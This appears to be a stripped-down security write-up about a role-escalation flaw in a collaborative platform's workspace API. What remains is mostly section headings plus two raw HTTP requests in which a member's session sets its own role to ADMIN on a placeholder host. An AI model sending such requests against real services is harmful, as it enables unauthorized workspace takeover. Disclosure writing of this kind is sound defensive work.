Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
The Initial Discovery: Member Management Endpoint
POST /v2/workspace/{WORKSPACE-ID}/users
Host: api.target.com
Cookie: <Member's cookie>
Authorization: Bearer <Member's-JWT>
{
"role": "MEMBER"
}Privilege Escalation to Admin
POST /v2/workspace/{WORKSPACE-ID}/users
Host: api.target.com
Cookie: <Member's cookie>
Authorization: Bearer <Member's-JWT>
{
"role": "ADMIN"
}


Exploiting the Vulnerability: Full Workspace Takeover

How Attackers Could Obtain Necessary IDs

Taking It Further: Removing the Original Admin
Recommendations
Conclusion
Resources
PreviousHow We Secured Our Client’s Platform Against Interaction-Free Account TheftsNextDecoding Server Behavior: The Key to Mass Account Takeover
Last updated